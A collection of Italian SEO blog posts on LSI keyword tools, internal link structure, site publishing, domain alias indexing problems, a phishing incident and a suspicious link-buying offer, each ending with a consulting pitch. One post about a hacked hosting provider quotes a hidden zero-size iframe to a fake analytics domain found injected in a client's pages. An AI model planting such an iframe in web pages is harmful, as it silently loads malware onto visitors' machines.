LSI Latent Semantic Indexing Tools

Diventa sempre più difficile ottimizzare i contenuti dei siti e ottenere dei posizionamenti importanti,  questo da quando Google ha implementato e applicato due strategie

  1. analisi dei contenuti duplicati per la lotta allo spam (le pagine che hanno contenuti gia presenti nei suoi indici incappano spesso nella marcatura di contenuto duplicato quindi non indicizzate). Questo vale sia per contenuti presio da altri asiti che per contenuti presi da altre pagine del nostro sito.
    Approfondimento sui contenuti duplicati (risultati supplementari)
  2. analisi del contenuto del sito e confronto col contenuto dei siti che parlano dello stesso argomento nel web (Glossario del sito e glossario del web su un determinato argomento). Questo algoritmo permette una migliore selezione dei siti da presentare come risultati delle SERP (pagine dei risultati di ricerca).  Sto parlando del Latent Semantic Indexing (LSI) . Indicizzazione semantica dei siti.

Video con una buona spiegazione su cosa sia e sulle implicazioni del Latent Semantic IIndexing

Tre (tools) strumenti per webmasters che vogliano ottimizzare il loro sito applicando le regole dell’ LSI nella scelta della parole / frasi chiave da usare.

  1.  Glossario delle SERP. Questo strumento analizza i primi 100 risultati di google su una determinata parola chiave o frase chiave e fornisce l’elenco delle parole e frasi usate dai siti che Google ritiene importanti su quell’argomento (otteniamo praticamente una buona approssimazione del contenuto semantico usato da google per quella frase)LSI tool per la semantica dei risultati

  2. Ricerche correlate.  Cercando una frase es. “cambio automatico” in fondo alla pagina di ricerca compaiono le ricerche correlate che forniscono altro indizio utile sulla semantica applicata da Google per la frase cercata.
    Da notare che le riceche correlate forniscono frasi che sono spesso contenute nei rislutati che si ottengono con lo strumento sopra (glossario delle SERP)
  3. Glossario del sito. Un tool interessante che analizza tutte le pagine di primo livello del tuo sito e ne estrae le parole che hai usato fornendo il glossario del sito e permettendo di confrontarlo con il glossario semantico delle SERP su Google e TROVARE LE PAROLE FRASI CHIAVE  che non hai  usato e che sarebbe opportuno usare.
    LSI tool per la semantica del sito (glossario del sito)

Key correlate a Latent Semantic Indexing: Lsa Latent semantic analysis, probabilistic latent semantic indexing,  indexing latent semantic analysis, latent semantic indexing seo, latent variable analysis

————————————————————————————————————–
Vuoi sapere SE IL GLOSSARIO DEL TUO SITO E’ OK? 
Sito con buon glossario vuol dire da +20 a +50% di visibilità!!


Contattami

Internal Links HotLink Matrice Interna

I link per la navigazione fra le pagine di un sito sono chiamati INTERNAL LINKS (Links interni)

Uno degli aspetti importanti nell’ottimizzazione di un sito web è la matrice dei link interni. La struttura di navigazione del sito per il quale valgono alcune regole fondamentali

  1. PROFONDITA DEI LINK i contenuti importanti del sito, per i quali vogliamo farci trovare devono essere raggiungibili al massimo con due click.
  2. STRUTTURA AD ALBERO la struttura più performante è quella che partendo dalla home page del sito genera una serie di pagine di primo livello (raggiungibili con un link ) capostipidi di una eventuale sezione interna (minisito interno)
  3. HOTLINK (LINK SEO) In ogni pagina del sito bisogna avere un link che torna al dominio
  4. LINK TESTUALI CON ANCHOR TEXT i link più performati sono quelli testuali mentrre per i link su immagini diventa importante il contenuto del tag ALT dell’immagine

Un utile tools per i webmasters è la toolbar di Firefox  chiamata SEQUAKE che fra le sue funzioni fornisce l’elenco dei link interni ed esterni presenti in una pagina web segnalando in maniera molto utile anche i link nofollow.

————————————————————————————————————–
Vuoi sapere SE IL TUO HOT LINK FUNZIONA? 
Un LINK SEO ottimizzato alza del 20% il valore del tuo sito!!!


Contattami

Pubblicazione Indicizzazione Siti con Adwords

La pubblicazione del sito web

L’operazione di pubblicazione di un sito web è spesso ingiustamente trascurata dai webmasters ed è facile vedere dei siti con pagine in costruzione o peggio ancora siti dove è stata pubblicata esclusivemente la home page.

  1. Vale la regola assoluta che un sito deve essere tenuto lontano dagli spider fino a che non sia terminato  sia come struttura che come inserimento dei contenuti.
  2. Funziona anche il detto “Chi ben inizia è a metà dell’opera”

Tenere lontani gli spider è semplice quando il sito lo realizziamo in locale sul nostro computer e lo pubblichiamo solo quando è terminato.
Nel caso dei CMS come Joomla dove spesso i webmasters realizzano il sito online è indispensabile aggiungere un file robots.txt col comando di esclusione
User-agent: *
Disallow: /
inoltre è bene tenere il sito offline con l’apposito comando della configurazione
Tenere CMS joomla offline

Perchè tenere il sito offline?
I motori di ricerca al momento dell’indicizazione si fanno un’idea dei contenuti del sito nel suo complesso, del glossario usatato dal sito, della sua struttura di link, ecc  e come si puo ben capire un sito incompleto fornisce un’immagine parziale che poi richiede tempo e lavoro per essere modificata a nostro favore.

Iniziare bene la pubblicazione sottintende una operazione di inserimento nei motori di ricerca, nelle directory, ecc . Attualmente il sistema migliore per pubblicare un sito è quello di farselo pubblicare da un’altro sito importante (alto PR, apprezzato dai motori, un buon Rank di Alexa, possibilmente sito anziano).  Questa pubblicazione avviene  tramite una piccola recensione o tramite un link testuale.

Forzare la pubblicazione e l’indicizzazione tramite Adwords.
Adwords funziona anche come strumento di pubblicazione siti.

  • registro il dominio
  • realizzo una o piu pagine del sito o una o piu landing
  • attivo una campagna Adwords con  i link che puntano a questo dominio
  • la conseguenza è che Google deve per forza indicizzare il sito per far funzionare la campagna

————————————————————————————————————–
Vuoi PUBBLICARE BENE IL TUO SITO? 
Vuoi FAR INDICIZZARE il tuo sito su Google?

Contattami

 —————————————————————————————–

Dominio Alias Problemi coi Trasferimenti Siti

Già abbiamo evidenziato i problemi di indicizzazione che porta un uso non adeguato del settaggio degli alias del dominio ( Indicizzazione a macchie di Leopardo ).

Aggiungiamo un altro problema che potrebbe essere collegato.
Abbiamo un dominio sul provider Register e lo passiamo sul provider Tophost controlliamo l’indicizzazione e ci accorgiamo che le pagine interne del sito sono indicizzate mentre la home in precedenza indicizzata adesso è scomparsa.

La causa piu probabile potrebbe essere imputabile al passaggio dello spider in un momento in cui il server era out oppure i server DNS non erano ancora aggiornati.

Pero….
Controlliamo su www.bing.com il nuovo motore Microsoft e troviamo il sito posizionato ma con la versione alias del dominio cioè senza www
A questo punto facciamo il controllo e su tophost non è attivato di default l’alias senza www questo comporta che sul motore  bing ho pagine indicizzate che danno errore 404 (non si vedono) e mi evidenzia una seconda possibilità che giustifica la mancata indicizzazione della home

Tabella dei provider e del loro settaggio alias

Provider www.dominio.ext dominio.ext
www.register.it si si
www.tophost.it si no
www.misterdomain.eu si si
www.seeweb.it si no
www.tiscali.it si si
www.unibit.it si si
www.aruba.it si si

Terapia:
Attendere il prossimo passaggio dello spider tutto dovrebbe andare a posto
Eventuale riproposizione della site map
Se ci sono pagine interne oltre alla home indicizzate in maniera errata si puo usare il file .htaccess per fare dei “Redirect permanent”

Small Business e Ottimizzazione Siti Web

Seguendo le linee guida dettate da Google si ottengono dei siti ben ottimizzati sia per gli spider che per gli utenti, ma questo è sufficiente per ottenere posizionamenti interessanti  e adeguati a portare visibilità?

Da quando è di moda la link popularity tutti i guru si sono sbrigati a dare un peso molto basso ai fattori di  ottimizzazione detti onsite (intendento struttura del sito,  struttura della matrice di link interna, ottimizzazione dei contenuti della pagina).

Alcuni capisaldi provenienti dall’esperienza di tanti siti realizzati e ottimizzati.

  1. ottimizzare i nomi dei file affinche contengano 2 o 3 parole chiave è importante
  2. ottimizzare la struttura dei link di un sito facendo si da raggiungere i contenuti importanti con un solo (massimo 2) link è importante
  3. ottimizzare la distribuzione dei contenuti ( o anche solo delle immagini) in cartelle è importante
  4. ottimizzare la distribuzione dei contenuti testuali all’interno della pagina è importante
  5. ottimizzare le evidenziazioni dei contenuti testuali all’interno della pagina è importante
  6. ottimizzare le immagini e gli alt delle stesse è importante specialmente quando sull’immagine inseriamo un link
  7. testo di ancoraggio dei link, ec.. …..

Due però sono le cose più importanti in assoluto

  • prima di ottimizzare dedicare molto tempo allo studio delle parole e delle frasi chiave da usare nel sito (SU COSA VOGLIO FARMI TROVARE)
  • ottimizzare il marketing della pagina (OTTIMIZZANDO MI FACCIO TROVARE MA SE POI NON SONO APPETIBILE?)

Rispondo adesso alla domanda se conviene ancora dedicare tanto tempo all’ottimizzazione del sito.

Ebbene la risposta è SI CONVIENE 

Ottimizzazione sito web realizzato con “Web Page Maker”

es. sito www.supportoinformatico.com  Ristrutturazione

Controllo iniziale: 1 unico posizionamento su Google
Azione: studio delle parole/frasi chiave e ottimizzazione struttura e contenuti (nessuna azione di link popularity ) 
Risultato: 
dopo la ristrutturazione passati pochi giorni decine di posizionamenti nei primi dieci posti su Google per frasi sulla long tail ( “assistenza computer roma eur” quinto su 350.000 ma anche per frasi competitive (“realizzazione reti wifi roma” secondo su 59.000, “assistenza computer di domenica roma” quarto su 97.000) e decine di altri posizionamenti

————————————————————————————————————–
Vuoi sapere SE IL TUO HOT LINK FUNZIONA? 
Vuoi sapere se IL TUO SITO PUO’ ESSERE OTTIMIZZATO?

Contattami

—————————————————————————————–

Thunder Provider con Virus

Il sito di un cliente da 2 giorni non visibile ricompare con un bel virus

  • il sito del provider stesso è stato off line evidentemente ha subito un brutto attacco
  • controllo fra i compagni di IP del dominio del mio cliente e verifico vari siti off line che ancora non hanno ripristinato
  • entrando nel sito parte l’antivirus che segnala un virus

A questo punto analizzo il codice e sorpresa un bel iframe che si maschera da codice di analytics vado a vedere questo ipotetico analytics.net e si capisce subito che niente ha a vedere con Google (evidentemente Google non ha registrato il altrimenti questo dominio non farebbe spam)

Codice incriminato
<iframe src=”http://m-analytics.net/arwe/?736361acd09ca9717c9462514beb5205″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

E’ la prima volta che mi capita questo iframe
Il danno al cliente è notevole e puo diventare una catastrofe se non autorizza in fretta il trasferimento
Inoltre vanno pulite tutte le pagine comprese quelle in lingua e quelle dei 2 blog appoggiati sullo stesso dominio.

CERTO CHE IL WEB DIVENTA SEMPRE PIU UNA JUNGLA

—————————————–
Vuoi sapere quanto tempo istruzione è necessario per ristrutturare il tuo sito in proprio? 
Vuoi sapere se ci sono le condizioni per realizzare questa strategia per il tuo sito?
Vuoi sapere quanto puoi risparmiare con questo sistema?
 

Telefonami al 3398736464 o lascia un commento
———————————-

Indicizzazione a macchie di Leopardo

Ho ristrutturato e ottimizzato il sito di un cliente nel settore dei prestiti mutui e convenzioni.
Passano i giorni e nel controllare se compare su google (site:www.nomesitolungo.it e anche nomesitolungo.it) mi accorgo che il cliente ha anche:
nomesitolungo.com
nomesitolungo.biz
nomesitolungo.org
nomesitolungo.net
nomesitolungo.info
nomesitolungo.us
tutti reindirizzano sul dominio it ma qualcosa non quadra perche Google ha indicizzato un paio di pagine sul comun paio di pagine su org ecc. Evidentemente il reindirizzamento è stato fatto male ho il cliente incautamente ha ritenuto di pubblicare la fotocopia del sito negli altri domini rovinando tutto il lavoro di ottimizzazione.

Indicizzazione errata di vari domini con alias

Questa strana indicizzazione porta come conseguenza che:

  1. il dominio base .it risulta indicizzato solo per la home (con risultati molto importanti, ma solo di una pagina)
  2. ritengo che in mancanza di un rapido intervento l’indicizzazione del dominio .it si fermi alla home vanificando tutto il lavoro

A questo punto ho indagato presso il cliente chiedendo di avere i dati FTP degli altri domini per fare un reindirizzamento manuale con un link nella  pagina index di ogni singolo dominio.

Ebbene le indagini successive e il colloquio col webmaster  hanno portato alla scoperta che tutti i domini sono stati allocati come Alias di quello principale e questo porta alla indicizzazione a macchie di leopardo.

Terapia :
Gestire con redirect tutti i domini escluso www.nomesitolungo.it  (il principale) e nomesitolungo.it senza www  (perche sta usandolo per le campagne Adwords)

—————————————–
Il tuo sito non si fà trovare? Vuoi sapere se si può ristrutturare? 
Vuoi sapere cosa si può ottenere ristrutturando?
 

Telefonami al 3398736464 o lascia un commento
———————————-

Phishing-cheapnet-skype-cina

giovedì 23 aprile 2009

Ore 8,30 Cheapnet da i numeri
Per tutta la mattinata è stato un continuo interrompere la connessione Internet e avevo vari lavori urgenti da fare online. Certo che questo fornitore di connessione a internet non è molto adatto a chi deve lavorare con continuità sulla rete. 4 giorni fa la connessione è rimasta assente dalle ore 22 fino alle ore 11 della mattina dopo
Ore 9,49 Servizio sito che rende
Rispondo ad uno sfortunato che è caduto nelle grinfie delle affiliazioni tipo (Gigacenter catene di multilivello) e che mi ha chiesto se il suo negozio che ha aperto gratis possa rendergli. Purtroppo per rendere un negozio di vendita online deve avere visibilità, il sito di per se non potrà mai averne e quindi lo sfortunato dovrà andare a pagamento su Adwords investendo lui i soldi al posto del capofila che senza investire una lira lascia che siano gli altri a rischiare e cercare visibilità. Il colmo è che ti fanno credere di diventar ricco cercando altri da turlupinare nel giro. Etica e morale sono dalole stelle alle stalle.
Ore 11 telefonata con Skype in Cina
Il mio cliente importatore al quale sto fornendo la consulenza per ottimizzare il sito mi chiede di telefonargli ad un numero in Cina tramite Skype per comunicazioni urgenti. Sono costretto a comperare un po di credito Skype, credito che non ho mai acquistato perché telefono gratis in tutt’Italia grazie a Fastweb. Procedo all’acquisto operazione semplice col mio conto su PayPal, poi dopo 2 tentativi sempre interrotti dai problemi con Cheapnet riesco a fare 6 minuti di telefonata (perfetta come qualità) al costo di 0,22€  che mi sembra piuttosto buono.
Ore 11,30 Registrazione domini su MysterDomain
Mister Domain offre un dominio gratis per ogni dominio registrato e allora decido di approfittare e registro un paio di domini nuovi (con varie interruzzioni e ha rischio di non riuscire a completare l’operazione a causa di Cheapnet
Ore 14 Consulenza per ottimizzazione sito
Termino l’ottimizzazione dei testi del sito in ristrutturazione al quale ho fornito la consulenza e invio i testi al webmaster
Ore 16 Siti di clienti non visibili
Navigando capito sul sito di un mio cliente e mi accorgo che non è visibile. Panico tento di telefonare al cliente ma ha il telefono occupato, lascio passare 10 minuti, il sito sempre oscurato provo a telefonare ad altro cliente che si trova a 1 Km di distanza e ha la connessione e il sito con lo stesso provider, anche lui col sito oscurato e vengo a sapere che sono stati avvertiti di questa interruzzione che durerà probabilmente tutto il giorno.
Terribile il valore di uptime è uno degli indici della qualità del servizio di hosting. In questo caso l’hosting non era stato scelto da me ma trovato quando ho ristrutturato il sito.
Ore 16,57 Contatto agenzia web in collaborazione in Umbria
Mi sono accorto che uno dei suoi siti in Joomla presenta ancora il problema di codice sospetto bloccato dall’antivirus per cui lo avverto e gli comunico che che deve aiutarmi a pubblicare un sito di un cliente tramite link di presentazione
Ore 17 Fatturazione
Faccio qualche fattura per lavori fatti durante il mese
Ore 20 Seo Elite Phishing
Ricevo alle ore 17,59  una email che leggo alle ore 20 . Email critica che mi avverte del pericolo di pishing su email con offerta di update del software Seo Elite non proveniente dal sito originale. Siccome avevo appena 2 gg fà fatto l’update vado a controllare e mi accorgo con grande ansia di essere stato pescato (è la seconda volta in 8 anni). Mando un messagio direttamente a Brad Callen Chiedendo cosa fare) e mi risponde dal suo iPhone nel giro di 10 minuti dicendomi di aprire un ticket.
Apro un ticket descrivendo quanto successo. Subito cancello il software di aggiornamento che avevo scaricato faccio partire Adware per il controllo del computer (3 ore di scansione). Faccio partire l’antivirus Vedremo

Servizio Consulenza Rifacimento Siti

La ditta sistema il proprio sito aziendale

Uno dei servizi che offro ai miei clienti è quello di fornire:

  • Consulenza per rifare il sito web aziendale da soli nell’ottica dei motori  di ricerca e  affinche renda
  • Istruzioni dirette con affiancamento presso la loro sede o in telefonia con skype e desktop remoto
  • controllo e correzioni in corso d’opera affinche non si generino problemi
  • aiuto alla pubblicazione

Per poter realizzare questo progetto è necessario che all’interno della ditta sia presente una o più persone che sappiano un po di grafica e di web. Inoltre è necessario avere a disposizione un qualche programma per editare e realizzare le pagine.

Poche regole di ottimizzazione, qualche ora di istruzioni, un po di pazienza e l’attenzione massima a salvare quello di buono che il sito già possiede (sempre come visibilità su internet)  e il gioco è fatto.

A qualcuno potrà sembrare impossibile ma posso assicurare che non solo è possibile ma ha volte auspicabile.
Il vantaggio più grande è che si creano competenze interne utili all’aggiornamento del sito web.
Naturalmente si tratta di siti semplici ma sufficienti a fare business e ha portare soddisfazioni.

Con questo sistema ho aiutato:
ditte che hanno realizzato o modificato siti di ecommerce con Incomedia WebsiteX5
ditte  che hanno realizzato il loro sito aziendale
ditte che hanno ristrutturato siti invisibili sui motori che adesso funzionano

Oggi ho fatto 3 ore di istruzione presso la sede di una ditta che in precedenza aveva realizzato il sito con questa strategia. Questo intervento dopo 2 anni perche hanno perso l’operatrice interna che aveva imparato, trasferitasi  presso un’altra città.  A riprova che il sistema funziona.

Vuoi sapere quanto tempo istruzione è necessario per ristrutturare il tuo sito in proprio? 
Vuoi sapere se ci sono le condizioni per realizzare questa strategia per il tuo sito?
Vuoi sapere quanto puoi risparmiare con questo sistema?
 

Telefonami al 3398736464 o lascia un commento

Servizio Consulenza Scambio Link

Un mio cliente che accede per la prima volta al servizio di consulenza sullo scambio di link pubblicitari con altri siti mi gira questa email:

Caro Proprietario del Sito,
Vorremmo acquistare spazi pubblicitari sul vostro sito per i nostri clienti.  Qualora fosse interessato, la prego di volermi contattare per discutere la proposta nei dettagli .

La ringrazio e la saluto cordialmente,
M….. D……

Trattasi di una classica abboccata per siti particolari (l’indirizzo di provenienza naturalmente è del tipo m…..@gmail.com ) ma per far capire al cliente rispondo alla richiesta inviando anche al cliente stesso la risposta

 

Cara M…..

dovresti dirmi che spazi e soprattutto per pubblicizzare che cosa. Poi possiamo parlarne

C……

Webmaster del sito www.miosito.it 

 

Al che puntualmente arriva la risposta che giro al mio cliente con il consiglio di lasciar perder

 

Buongiorno,

La ringrazio per la Sua gentile risposta.

Il nostro cliente gestisce un sito web molto noto e affidabile interamente dedicato al gioco d’azzardo online e si è detto interessato a comprare uno spazio pubblicitario (un piccolo blocco costituito di 5/6 brevi frasi con 1/2  link) nelle 3 sottopagine selezionate.  Ciò corrisponde a 3 blocchi e 5/6 link in totale.

Il nostro cliente propone un pagamento anticipato di 120 $ annuali versati su Paypal.  Il pagamento avverrà entro 72 ore. 

Se Lei gestisce altri siti, le proponiamo un pagamento separato per ogni portale, a condizione di poter approvare i testi prima che vengano pubblicati.

Se non ritiene di poter accettare questa offerta, La prego di volermi suggerire livelli di prezzo e condizioni di cooperazione che ritiene maggiormente opportuni.

Rimango in attesa di un suo cortese cenno di riscontro.  

Cordialmente M….. D……

 

Analisi e Conclusioni:

  • il sito del mio cliente è del 2003 ha Page Rank 3 e moltissimi posizionamenti in prima pagina sulle SERP di Google
  • l’argomento dei due siti è completamente diverso senza punti di contatto
  • l’offerta di 120 $ (notare la raffinatezza si tratta di dollari quindi siamo a meno di 100 euro) per 6 link distribuiti in 3 pagine (1 euro al mese per ogni link, meglio regalarli a chi se li merita)
  • i link verso queste risorse sono molto sospetti e con forti possibilità che Google penalizzi il sito che li ospita

Lo scambio link o il lincare siti di valore fa bene al sito perchè espone risorse utili. Il lincare siti spam o siti non di valore puo danneggiare seriamente il sito.

Quindi fare molta attenzione a consigliare bene i proprietari dei siti che avete realizzato.

 

————————————————————————— 

Vuoi sapere qual’è il link più importante del tuo sito?

—————————————————————————